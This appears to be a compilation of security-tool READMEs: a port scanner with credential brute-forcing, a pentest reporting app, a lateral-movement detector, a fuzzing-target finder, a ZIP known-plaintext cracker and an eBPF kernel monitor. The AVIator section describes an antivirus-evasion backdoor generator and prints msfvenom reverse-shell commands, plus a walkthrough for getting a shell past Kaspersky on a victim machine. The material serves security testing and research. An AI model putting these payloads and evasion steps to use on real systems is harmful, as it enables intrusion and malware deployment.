usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]


optional arguments:
-h , --help show this help message and exit
-f , --fofa Get the detection object from fofa, you need to configure the environment variables in advance: FOFA_EMAIL, FOFA_KEY
-t , --target Specify the detection target:
IP address: 114.114.114.114
IP address segment: 114.114.114.114/24, subnet mask less than 12 is not recommended
IP address range: 114.114.114.114-115.115.115.115
URL address: https://www.baidu.com
File address: file:/tmp/target.txt
--spy network segment detection mode, in this mode, the internal network segment reachable by the host will be automatically detected. The acceptable parameters are:
(empty), 192, 10, 172, all, specified IP address (the IP address B segment will be detected as the surviving gateway)
--check only fingerprint the specified target address; port scanning will not be performed
--scan will perform port scanning and fingerprinting on the target objects provided by --fofa and --spy
-p , --port scan the specified port, TOP400 will be scanned by default, support: 80, 8080, 8088-8090
-eP, --excluded-port skip scanning specified ports, support: 80,8080,8088-8090
-o , --output save scan results to file
-oJ save the scan results to a file in json format
-Pn After using this parameter, intelligent survivability detection will not be performed. Now intelligent survivability detection is enabled by default to improve efficiency.
-Cn With this parameter, the console output will not be colored.
-sV After using this parameter, all ports will be probed with full probes. This parameter greatly affects the efficiency, so use it with caution!
--top Scan the filtered common ports TopX, up to 1000, the default is TOP400
--proxy set proxy (socks5|socks4|https|http)://IP:Port
--threads thread parameter, the default thread is 100, the maximum value is 2048
--path specifies the directory to request access, only a single directory is supported
--host specifies the header Host value for all requests
--timeout set timeout
--encoding Set the terminal output encoding, which can be specified as: gb2312, utf-8
--match filter results by keyword in the returned banner; only assets whose banner contains the keyword are displayed
--hydra automatic blasting support protocol: ssh, rdp, ftp, smb, mysql, mssql, oracle, postgresql, mongodb, redis, all are enabled by default
hydra options:
--hydra-user custom hydra blasting username: username or user1,user2 or file:username.txt
--hydra-pass Custom hydra blasting password: password or pass1,pass2 or file:password.txt
If there is a comma in the password, use \, to escape, other symbols do not need to be escaped
--hydra-update append mode for custom usernames/passwords: with this parameter the supplied entries are added to the default dictionary; without it they replace the default dictionary.
--hydra-mod specifies the automatic brute force cracking module: rdp or rdp, ssh, smb
fofa options:
--fofa-syntax will get fofa search syntax description
--fofa-size will set the number of entries returned by fofa, the default is 100
--fofa-fix-keyword Modifies the keyword, and the {} in this parameter will eventually be replaced with the value of the -f parameter

The functionality is not complicated; the remaining options can be explored on your own.
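
For example, an illustrative run built only from the options above (adjust the target file, ports and modules to your environment):

kscan -t file:/tmp/target.txt --top 1000 --hydra --hydra-mod rdp,ssh -o result.txt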

6 Demo

6.1 Port Scan Mode

6.2 Survival network segment detection

6.3 Fofa result retrieval

6.4 Brute-force cracking

6.5 CDN identification



APTRS - Automated Penetration Testing Reporting System


APTRS (Automated Penetration Testing Reporting System) is an automated reporting tool written in Python and Django. The tool allows penetration testers to create a report directly without using a traditional DOCX file. It also provides a way to keep track of projects and vulnerabilities.


Documentation

Documentation

Prerequisites

Installation

The tool has been tested using Python 3.8.10 on Kali Linux 2022.2/3, Ubuntu 20.04.5 LTS, Windows 10/11.

Windows Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.bat

Linux Installation

  git clone https://github.com/Anof-cyber/APTRS.git
cd APTRS
install.sh

Running

Windows

  run.bat

Linux

  run.sh

Features

  • Demo Report
  • Managing Vulnerabilities
  • Manage All Projects in one place
  • Create a Vulnerability Database and avoid writing the same description and recommendations again
  • Easily Create PDF Report
  • Dynamically add POC, Description and Recommendations
  • Manage Customers and Company

Screenshots

Project

View Project

Project Vulnerability

Project Report

Project Add Vulnerability

Roadmap

  • Improving Report Quality
  • Bulk Instance Upload
  • Pentest Mapper Burp Suite Extension Integration
  • Allowing Multiple Project Scope
  • Improving Code, Error handling and Security
  • Docker Support
  • Implementing Rest API
  • Project and Project Retest Handler
  • Access Control and Authorization
  • Support Nessus Parsing

Authors



LATMA - Lateral Movement Analyzer Tool


Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately; the event log collector should be executed on a Windows machine in an Active Directory domain environment with Python 3.8 or above. The analyzer can be executed on either a Linux or a Windows machine.


The Collector

The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires access to LDAP/S (ports 389 and 636) and RPC (port 135) on the domain controller and clients. In addition, it requires domain admin privileges, a user in the Event Log Readers group, or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as output a comma-delimited CSV file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credentials of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.
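
A minimal sketch of consuming that CSV (the exact column header names are assumptions made for illustration; align them with the header your collector actually writes):

# parse_auth_log.py - illustrative only; column names are assumed
import csv
from datetime import datetime

with open("logs.csv", newline="") as fh:
    for row in csv.DictReader(fh):
        ts = datetime.strptime(row["timestamp"], "%Y/%m/%d %H:%M")
        print(ts, row["source host"], "->", row["destination"],
              row["username"], row["auth type"], row.get("SPN", ""))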

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in the Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be given as NetBIOS names and not IP addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attacker's movement. The lateral movement graph is not always a simple path; in some attacks the attacker branches out in many different directions.

  • Alert: A sub-graph the algorithm suspects is part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services "rpc", "rpcss" and "termsrv".

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines that many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches accounts to the machines they frequently authenticate from. If an account authenticates from a machine on at least three different days in a three-week period, the account is matched to that machine, and any authentication of this account from the machine is considered benign and removed from the authentication graph.
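
The thresholds above translate naturally into a pre-filtering pass over the authentication edges. A minimal sketch of that idea (illustrative only, not LATMA's actual implementation; the field layout is assumed):

# classify_sinks_hubs.py - illustrative only
from collections import defaultdict

SINK_THRESHOLD = 50   # distinct accounts authenticating TO a machine
HUB_THRESHOLD = 20    # distinct accounts authenticating FROM a machine

def prefilter(edges):
    # edges: iterable of (source, destination, account) tuples
    edges = list(edges)
    to_accounts, from_accounts = defaultdict(set), defaultdict(set)
    for src, dst, account in edges:
        to_accounts[dst].add(account)
        from_accounts[src].add(account)
    sinks = {m for m, accts in to_accounts.items() if len(accts) >= SINK_THRESHOLD}
    hubs = {m for m, accts in from_accounts.items() if len(accts) >= HUB_THRESHOLD}
    # authentications to sinks or from hubs are treated as benign and dropped
    kept = [(s, d, a) for s, d, a in edges if d not in sinks and s not in hubs]
    return sinks, hubs, kept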

The lateral movement IoCs are:

White cane - User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and, following that, from machine B to machine C. This IoC potentially indicates an attacker performing an actual advance from its initial foothold (A) to a destination machine that better serves the attack's objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being an admin user).

Weight Shift - White cane (see above) from machine A to machines {B1, ..., Bn}, followed by another White cane from machine Bx to machines {C1, ..., Cn}. This IoC potentially indicates an attacker that has determined that machine B better serves the attack's purposes and from then on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants/executes ransomware on a large number of machines simultaneously.
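
To make the Bridge pattern concrete, here is a tiny sketch of how consecutive hops by the same account could be matched on the filtered edge list (illustrative only, not LATMA's algorithm; the tuple layout is assumed):

# detect_bridges.py - illustrative only
def find_bridges(edges):
    # edges: list of (timestamp, account, source, destination), sorted by timestamp
    bridges = []
    for i, (_, account, a, b) in enumerate(edges):
        for _, account2, src, dst in edges[i + 1:]:
            # same account continues from the machine it just reached: A -> B, then B -> C
            if account2 == account and src == b and dst not in (a, b):
                bridges.append((account, a, b, dst))
    return bridges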

Output:

The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
  2. A GIF file representing the progression, whereby each frame of the GIF specifies exactly what the suspicious action was
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color

Dependencies:

  1. Python 3.8
  2. libraries as follows in requirements.txt
  3. Run pip install . for running setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.

usage

The Collector

Required arguments:

  1. credentials [domain.com/]username[:password] credentials format; alternatively provide [domain.com/]username and the password will be prompted for securely. For the domain, please insert the FQDN (Fully Qualified Domain Name).

Optional arguments:

  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query a specific OU or container in the domain; all workstations in sub-OUs will be included as well. Each OU should be given as a DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from. month-day-year format, if not specified take all available data
  8. -threads amount of working threads to use
  9. -ldap Use Unsecure LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file authentication file should contain list of NTLM and Kerberos requests

Optional arguments:

  2. -output_file The location the CSV with all the IoCs is going to be saved to
  3. -progression_output_file The location the CSV with the IoCs of the lateral movements is going to be saved to
  4. -sink_threshold Number of accounts from which a machine is considered a sink, default is 50
  5. -hub_threshold Number of accounts from which a machine is considered a hub, default is 20
  6. -learning_period Learning period in days, default is 7 days
  7. -show_all_iocs Show IoCs that are not connected to any other IoCs
  8. -show_gant If true, output the events in a Gantt format

Binary usage: open a command prompt and navigate to the binary folder, then run the executables with the arguments specified above.

Examples

In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python eventlogcollector.py domain.com/username:password -ntlm -kerberos
  2. python analyzer.py logs.csv


AVIator - Antivirus Evasion Project


AviAtor Ported to NETCore 5 with an updated UI


AV|Ator

About://name

AV: AntiVirus

Ator: Is a swordsman, alchemist, scientist, magician, scholar, and engineer, with the ability to sometimes produce objects out of thin air (https://en.wikipedia.org/wiki/Ator)

About://purpose

AV|Ator is a backdoor generator utility, which uses cryptographic and injection techniques in order to bypass AV detection. More specifically:

  • It uses AES encryption in order to encrypt a given shellcode
  • Generates an executable file which contains the encrypted payload
  • The shellcode is decrypted and injected to the target system using various injection techniques

[https://attack.mitre.org/techniques/T1055/]:

  1. Portable executable injection which involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue.

  2. Thread execution hijacking which involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.


Usage

The application has a form which consists of three main inputs (see screenshot below):

  1. A text field containing the encryption key used to encrypt the shellcode
  2. A text field containing the IV used for AES encryption
  3. A text field containing the shellcode

Important note: The shellcode should be provided as a C# byte array.

The default values contain shellcode that executes notepad.exe (32bit). This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.

RTLO option

In simple words, it spoofs an executable file so that it appears to have an "innocent" extension like 'pdf', 'txt', etc. E.g. the file "testcod.exe" will be interpreted as "tesexe.doc".

Beware that some AVs flag the RTLO spoof on its own as malware.

Set custom icon

I guess you all know what it is :)

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell in a windows 10 machine running fully updated kaspersky AV

Target Machine: Windows 10 x64

  1. Create the payload using msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Use AVIator with the following settings

    Target OS architecture: x64

    Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

    Target procedure: explorer (leave the default)

  3. Set the listener on the attacker machine

  4. Run the generated exe on the victim machine

Installation

Windows:

Either compile the project or download the already compiled executable from the following folder:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Install Mono according to your Linux distribution, then download and run the binaries

e.g. in kali:

   root@kali# apt install mono-devel 

root@kali# mono aviator.exe

Credits

To Damon Mohammadbagher for the encryption procedure

Disclaimer

I developed this app in order to overcome the demanding challenges of the pentest process and this is the ONLY WAY that this app should be used. Make sure that you have the required permission to use it against a system and never use it for illegal purposes.



Fuzzable - Framework For Automating Fuzzable Target Discovery With Static Analysis


Framework for Automating Fuzzable Target Discovery with Static Analysis.

Introduction

Vulnerability researchers conducting security assessments on software will often harness the capabilities of coverage-guided fuzzing through powerful tools like AFL++ and libFuzzer. This is important as it automates the bughunting process and reveals exploitable conditions in targets quickly. However, when encountering large and complex codebases or closed-source binaries, researchers have to painstakingly dedicate time to manually audit and reverse engineer them to identify functions where fuzzing-based exploration can be useful.

Fuzzable is a framework that integrates both with C/C++ source code and binaries to assist vulnerability researchers in identifying function targets that are viable for fuzzing. This is done by applying several static analysis-based heuristics to pinpoint risky behaviors in the software and the functions that execute them. Researchers can then utilize the framework to generate basic harness templates, which can then be used to hunt for vulnerabilities, or integrated as part of a continuous fuzzing pipeline, such as Google's oss-fuzz project.

In addition to running as a standalone tool, Fuzzable is also integrated as a plugin for the Binary Ninja disassembler, with support for other disassembly backends being developed.

Check out the original blog post detailing the tool here, which highlights the technical specifications of the static analysis heuristics and how this tool came about. This tool is also featured at Black Hat Arsenal USA 2022.


Features

  • Supports analyzing binaries (with Angr and Binary Ninja) and source code artifacts (with tree-sitter).
  • Run static analysis both as a standalone CLI tool or a Binary Ninja plugin.
  • Harness generation to ramp up on creating fuzzing campaigns quickly.

Installation

Some binary targets may require some sanitizing (ie. signature matching, or identifying functions from inlining), and therefore fuzzable primarily uses Binary Ninja as a disassembly backend because of its ability to effectively solve these problems. As a result, it can be utilized both as a standalone tool and as a plugin.

Since Binary Ninja isn't accessible to everyone and there may be a demand to use the tool for security assessments and potentially scale it up in the cloud, an angr fallback backend is also supported. I anticipate incorporating other disassemblers down the road as well (priority: Ghidra).

Command Line (Standalone)

If you have Binary Ninja Commercial, be sure to install the API for standalone headless usage:

$ python3 /Applications/Binary\ Ninja.app/Contents/Resources/scripts/install_api.py

Install with pip:

$ pip install fuzzable

Manual/Development Build

We use poetry for dependency management and building. To do a manual build, clone the repository with the third-party modules:

$ git clone --recursive https://github.com/ex0dus-0x/fuzzable

To install manually:

$ cd fuzzable/

# without poetry
$ pip install .

# with poetry
$ poetry install

# with poetry for a development virtualenv
$ poetry shell

You can now analyze binaries and/or source code with the tool!

# analyzing a single shared object library binary
$ fuzzable analyze examples/binaries/libbasic.so

# analyzing a single C source file
$ fuzzable analyze examples/source/libbasic.c

# analyzing a workspace with multiple C/C++ files and headers
$ fuzzable analyze examples/source/source_bundle/

Binary Ninja Plugin

fuzzable can be easily installed through the Binary Ninja plugin marketplace by going to Binary Ninja > Manage Plugins and searching for it. Here is an example of the fuzzable plugin running, accurately identifying targets for fuzzing and further vulnerability assessment:

Usage

fuzzable comes with various options to help better tune your analysis. More will be supported in future plans and any feature requests made.

Static Analysis Heuristics

To determine fuzzability, fuzzable utilizes several heuristics to determine which targets are the most viable for dynamic analysis. These heuristics are all weighted differently using the scikit-criteria library, which utilizes multi-criteria decision analysis to determine the best candidates. These metrics and their weights can be seen here:

  • Fuzz Friendly Name (weight 0.3) - Symbol name implies behavior that ingests file/buffer input
  • Risky Sinks (weight 0.3) - Arguments that flow into risky calls (ie memcpy)
  • Natural Loops (weight 0.05) - Number of loops detected with the dominance frontier
  • Cyclomatic Complexity (weight 0.05) - Complexity of function target based on edges + nodes
  • Coverage Depth (weight 0.3) - Number of callees the target traverses into

As mentioned, check out the technical blog post for a more in-depth look into why and how these metrics are utilized.

Many metrics were largely inspired by Vincenzo Iozzo's original work in 0-knowledge fuzzing.

Every target you want to analyze is different, and fuzzable will not be able to account for every edge-case behavior in the target program. Thus, it may be important during analysis to tune these weights appropriately to see if different results make more sense for your use case. To tune these weights in the CLI, simply specify the --score-weights argument:

$ fuzzable analyze <TARGET> --score-weights=0.2,0.2,0.2,0.2,0.2
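
As a rough mental model of how these weights combine, here is a simplified weighted-sum sketch (illustration only; the tool itself relies on scikit-criteria's multi-criteria decision analysis rather than a plain weighted sum):

# fuzzability_weights.py - simplified illustration, not fuzzable's real scoring
WEIGHTS = {
    "fuzz_friendly_name": 0.3,
    "risky_sinks": 0.3,
    "natural_loops": 0.05,
    "cyclomatic_complexity": 0.05,
    "coverage_depth": 0.3,
}

def score(metrics, weights=WEIGHTS):
    # metrics: per-function heuristic values normalized to [0, 1]
    return sum(weights[name] * metrics.get(name, 0.0) for name in weights)

candidates = {
    "parse_header": {"fuzz_friendly_name": 1.0, "risky_sinks": 0.8, "coverage_depth": 0.6},
    "log_message":  {"fuzz_friendly_name": 0.0, "risky_sinks": 0.1, "coverage_depth": 0.2},
}
for name in sorted(candidates, key=lambda n: score(candidates[n]), reverse=True):
    print(f"{name}: {score(candidates[name]):.2f}")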

Analysis Filtering

By default, fuzzable will filter out function targets based on the following criteria:

  • Top-level entry calls - functions that aren't called by any other calls in the target. These are ideal entry points that have potentially very high coverage.
  • Static calls - (source only) functions that are static and aren't exposed through headers.
  • Imports - (binary only) other library dependencies being used by the target's implementations.

To see calls that got filtered out by fuzzable, set the --list-ignored flag:

$ fuzzable analyze --list-ignored <TARGET>

In Binary Ninja, you can toggle this setting via Settings > Fuzzable > List Ignored Calls.

In the case that fuzzable falsely filters out important calls that should be analyzed, it is recommended to use --include-* arguments to include them during the run:

# include ALL non top-level calls that were filtered out
$ fuzzable analyze --include-nontop <TARGET>

# include specific symbols that were filtered out
$ fuzzable analyze --include-sym <SYM> <TARGET>

In Binary Ninja, this is supported through Settings > Fuzzable > Include non-top level calls and Symbols to Exclude.

Harness Generation

Now that you have found your ideal candidates to fuzz, fuzzable will also help you generate fuzzing harnesses that are (almost) ready to instrument and compile for use with either a file-based fuzzer (ie. AFL++, Honggfuzz) or in-memory fuzzer (libFuzzer). To do so in the CLI:

If this target is a source codebase, the generic source template will be used.

If the target is a binary, the generic black-box template will be used, which ideally can be used with a fuzzing emulation mode like AFL-QEMU. A copy of the binary will also be created as a shared object if the symbol isn't exported directly to be dlopened using LIEF.

At the moment, this feature is quite rudimentary, as it will simply create a standalone C++ harness populated with the appropriate parameters, and will not auto-generate code that is needed for any runtime behaviors (ie. instantiating and freeing structures). However, the templates created by fuzzable should still get you up and running quickly. Here are some ambitious features I would like to implement down the road:

  • Full harness synthesis - harnesses will work directly with absolutely no manual changes needed.
  • Synthesis from potential unit tests using the DeepState framework (Source only).
  • Immediate deployment to a managed continuous fuzzing fleet.

Exporting Reports

fuzzable supports generating reports in various formats. The current ones that are supported are JSON, CSV and Markdown. This can be useful if you are utilizing this as part of automation where you would like to ingest the output in a serializable format.

In the CLI, simply pass the --export argument with a filename with the appropriate extension:

$ fuzzable analyze --export=report.json <TARGET>

In Binary Ninja, go to Plugins > Fuzzable > Export Fuzzability Report > ... and select the format you want to export to and the path you want to write it to.

Contributing

This tool will be continuously developed, and any help from external maintainers is appreciated!

  • Create an issue for feature requests or bugs that you have come across.
  • Submit a pull request for fixes and enhancements that you would like to see contributed to this tool.

License

Fuzzable is licensed under the MIT License.



Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed with the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bit integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher ciphertext entirely as well as other entries which were encrypted with the same password. It can also be used to brute-force the password with a complexity of n^(l-6), where n is the size of the character set and l is the length of the password.
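
To get a feel for that brute-force cost, a quick back-of-the-envelope calculation (not part of bkcrack):

# complexity n^(l-6): e.g. a 10-character password over a 62-character set
n, l = 62, 10
print(f"{n}**({l}-6) = {n**(l-6):,} candidate passwords")  # 14,776,336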

bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

  • Recover internal state from ciphertext and plaintext.
  • Change a ZIP archive's password using the internal state.
  • Recover the original password from the internal state.

Install

Precompiled packages

You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

Compile from source

Alternatively, you can compile the project with CMake.

First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install

Third-party packages

bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

Usage

List entries

You can see a list of entry names and metadata in an archive named archive.zip like this:

bkcrack -L archive.zip

Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

Recover internal keys

The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

Load data from zip archives

Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

Load data from files

Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

bkcrack -c cipherfile -p plainfile

Offset

If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

bkcrack -c cipherfile -p plainfile -o offset

Sparse plaintext

If you only know a small amount of contiguous plaintext (between 8 and 11 bytes), but also know some bytes at other known offsets, you can provide this information to reach the requirement of a total of 12 known bytes. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21
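
If you are unsure how to express those extra known bytes, Python's standard library converts readily between raw bytes and the hexadecimal form expected by -x (the offsets and values here simply mirror the example above):

# the -x flag takes an offset plus bytes in hexadecimal
known = b"KO"               # bytes believed to appear at offset 25
print(known.hex())          # '4b4f'  -> usable as: -x 25 4b4f
print(bytes.fromhex("21"))  # b'!'    -> the byte supplied at offset 30 above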

Number of threads

If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

Decipher

If the attack is successful, the deciphered data associated to the ciphertext used for the attack can be saved:

bkcrack -c cipherfile -p plainfile -d decipheredfile

If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

Decompress

The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

python3 tools/inflate.py < decipheredfile > decompressedfile

Unlock encrypted archive

It is also possible to generate a new encrypted archive with the password of your choice:

bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

Recover password

Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

You can be more specific by specifying a minimal password length:

bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

Learn

A tutorial is provided in the example folder.

For more information, have a look at the documentation and read the source.

Contribute

Do not hesitate to suggest improvements or submit pull requests on GitHub.

License

This project is provided under the terms of the zlib/png license.



KRIe - Linux Kernel Runtime Integrity With eBPF


KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.

KRIe has been developed using CO-RE (Compile Once - Run Everywhere) so that it is compatible with a large range of kernel versions. If your kernel doesn't export its BTF debug information, KRIe will try to download it automatically from BTFHub. If your kernel isn't available on BTFHub, but you have been able to manually generate your kernel's BTF data, you can provide it in the configuration file (see below).


System requirements

This project was developed on Ubuntu Focal 20.04 (Linux Kernel 5.15) and has been tested on older releases down to Ubuntu Bionic 18.04 (Linux Kernel 4.15).

  • golang 1.18+
  • (optional) Kernel headers are expected to be installed in /lib/modules/$(uname -r); update the Makefile with their location otherwise.
  • (optional) clang & llvm 14.0.6+

Optional fields are required to recompile the eBPF programs.

Build

  1. Since KRIe was built using CO-RE, you shouldn't need to rebuild the eBPF programs. That said, if you still want to rebuild them, you can use the following command:
# ~ make build-ebpf
  2. To build KRIe, run:
# ~ make build
  3. To install KRIe (copy to /usr/bin/krie) run:
# ~ make install

Getting started

KRIe needs to run as root. Run sudo krie -h to get help.

# ~ krie -h
Usage:
krie [flags]

Flags:
--config string KRIe config file (default "./cmd/krie/run/config/default_config.yaml")
-h, --help help for krie

Configuration

## Log level, options are: panic, fatal, error, warn, info, debug or trace
log_level: debug

## JSON output file, leave empty to disable JSON output.
output: "/tmp/krie.json"

## BTF information for the current kernel in .tar.xz format (required only if KRIE isn't able to locate it by itself)
vmlinux: ""

## events configuration
events:
  ## action taken when an init_module event is detected
  init_module: log

  ## action taken when a delete_module event is detected
  delete_module: log

  ## action taken when a bpf event is detected
  bpf: log

  ## action taken when a bpf_filter event is detected
  bpf_filter: log

  ## action taken when a ptrace event is detected
  ptrace: log

  ## action taken when a kprobe event is detected
  kprobe: log

  ## action taken when a sysctl event is detected
  sysctl:
    action: log

    ## Default settings for sysctl programs (kernel 5.2+ only)
    sysctl_default:
      block_read_access: false
      block_write_access: false

    ## Custom settings for sysctl programs (kernel 5.2+ only)
    sysctl_parameters:
      kernel/yama/ptrace_scope:
        block_write_access: true
      kernel/ftrace_enabled:
        override_input_value_with: "1\n"

  ## action taken when a hooked_syscall_table event is detected
  hooked_syscall_table: log

  ## action taken when a hooked_syscall event is detected
  hooked_syscall: log

  ## kernel_parameter event configuration
  kernel_parameter:
    action: log
    periodic_action: log
    ticker: 1 # sends at most one event every [ticker] second(s)
    list:
      - symbol: system/kprobes_all_disarmed
        expected_value: 0
        size: 4
      # - symbol: system/selinux_state
      #   expected_value: 256
      #   size: 2

      # sysctl
      - symbol: system/ftrace_dump_on_oops
        expected_value: 0
        size: 4
      - symbol: system/kptr_restrict
        expected_value: 0
        size: 4
      - symbol: system/randomize_va_space
        expected_value: 2
        size: 4
      - symbol: system/stack_tracer_enabled
        expected_value: 0
        size: 4
      - symbol: system/unprivileged_userns_clone
        expected_value: 0
        size: 4
      - symbol: system/unprivileged_userns_apparmor_policy
        expected_value: 1
        size: 4
      - symbol: system/sysctl_unprivileged_bpf_disabled
        expected_value: 1
        size: 4
      - symbol: system/ptrace_scope
        expected_value: 2
        size: 4
      - symbol: system/sysctl_perf_event_paranoid
        expected_value: 2
        size: 4
      - symbol: system/kexec_load_disabled
        expected_value: 1
        size: 4
